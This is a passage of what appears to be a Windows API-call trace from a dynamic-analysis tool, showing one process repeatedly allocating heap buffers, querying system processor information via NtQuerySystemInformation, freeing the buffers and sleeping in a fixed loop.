[0307.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0307.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0307.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0307.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0307.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0307.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0307.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0307.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0307.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e2510 [0307.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e2510 | out: hHeap=0x2560000) returned 1 [0307.253] Sleep (dwMilliseconds=0x110) [0307.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0307.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0307.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0307.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0307.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0307.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0307.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0307.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0307.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.268] Sleep (dwMilliseconds=0x110) [0307.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0307.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0307.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0307.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0307.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0307.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0307.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0307.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0307.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.284] Sleep (dwMilliseconds=0x110) [0307.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0307.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0307.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0307.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0307.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0307.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0307.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0307.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0307.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.300] Sleep (dwMilliseconds=0x110) [0307.309] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0307.309] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0307.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0307.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0307.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0307.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0307.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0307.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0307.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0307.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0307.314] Sleep (dwMilliseconds=0x110) [0307.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0307.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0307.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0307.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0307.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0307.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0307.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0307.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0307.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0307.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0307.332] Sleep (dwMilliseconds=0x110) [0307.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0307.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0307.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0307.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0307.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0307.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0307.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0307.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0307.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.347] Sleep (dwMilliseconds=0x110) [0307.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0307.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0307.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0307.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0307.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0307.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0307.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0307.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0307.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0307.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0307.363] Sleep (dwMilliseconds=0x110) [0307.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0307.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0307.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0307.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0307.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0307.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0307.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0307.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0307.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.380] Sleep (dwMilliseconds=0x110) [0307.387] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0307.387] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0307.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0307.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0307.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0307.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0307.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0307.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0307.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0307.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0307.395] Sleep (dwMilliseconds=0x110) [0307.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0307.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0307.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0307.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0307.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0307.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0307.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0307.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0307.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.411] Sleep (dwMilliseconds=0x110) [0307.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0307.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0307.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0307.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0307.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0307.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0307.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0307.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0307.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.437] Sleep (dwMilliseconds=0xb0) [0307.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0307.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0307.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0307.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0307.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0307.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0307.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0307.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0307.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dd4e8 [0307.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dd4e8 | out: hHeap=0x2560000) returned 1 [0307.457] Sleep (dwMilliseconds=0xb0) [0307.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0307.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0307.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0307.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0307.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0307.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0307.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0307.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: 